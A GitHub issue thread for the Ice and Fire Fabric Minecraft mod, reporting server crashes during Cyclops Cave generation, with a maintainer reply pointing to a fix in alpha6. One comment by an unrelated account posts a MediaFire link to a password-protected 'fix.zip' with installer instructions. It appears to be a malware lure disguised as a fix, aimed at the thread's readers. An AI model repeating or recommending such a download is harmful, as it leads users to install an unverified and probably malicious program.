### ISSUE TITLE
Server crashing when trying to generate Cyclops Cave

### ISSUE THREAD

**Issue by HellBri8nger** [ArkTechMC/IceAndFire-Fabric#35]
### What had happened?
I was generating new chunks and I kept crashing because it was trying to generate cyclopcs cave but couldn't for some reason

*What you have done and what happen*

### Mod Version (Include dependencies)
1.20.1-2.0.16

### Mod Loader Version
Fabric 0.16.2

### Game Log
https://mclo.gs/QCJKD8D

### Checklist

- [ ✅ ] I don't install Optifine
- [ ✅ ] I have installed other mods

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by IAFEnvoy** [comment]
known issue and fix in alpha6

can be downloaded in discord
